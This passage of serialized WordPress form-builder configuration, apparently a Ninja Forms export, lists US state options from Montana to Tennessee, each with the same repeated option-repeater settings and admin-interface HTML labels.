dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:27;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Montana\";s:5:\"value\";s:2:\"MT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:28;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Nebraska\";s:5:\"value\";s:2:\"NE\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:29;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:6:\"Nevada\";s:5:\"value\";s:2:\"NV\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:30;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:13:\"New Hampshire\";s:5:\"value\";s:2:\"NH\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:31;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:10:\"New Jersey\";s:5:\"value\";s:2:\"NJ\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:32;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:10:\"New Mexico\";s:5:\"value\";s:2:\"NM\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:33;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"New York\";s:5:\"value\";s:2:\"NY\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:34;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:14:\"North Carolina\";s:5:\"value\";s:2:\"NC\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:35;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:12:\"North Dakota\";s:5:\"value\";s:2:\"ND\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:36;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:4:\"Ohio\";s:5:\"value\";s:2:\"OH\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:37;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Oklahoma\";s:5:\"value\";s:2:\"OK\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:38;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:6:\"Oregon\";s:5:\"value\";s:2:\"OR\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:39;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:12:\"Pennsylvania\";s:5:\"value\";s:2:\"PA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:40;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:12:\"Rhode Island\";s:5:\"value\";s:2:\"RI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:41;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:14:\"South Carolina\";s:5:\"value\";s:2:\"SC\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:42;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:12:\"South Dakota\";s:5:\"value\";s:2:\"SD\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:43;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:9:\"Tennessee\";s:5:\"value\";s:2:\"TN\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 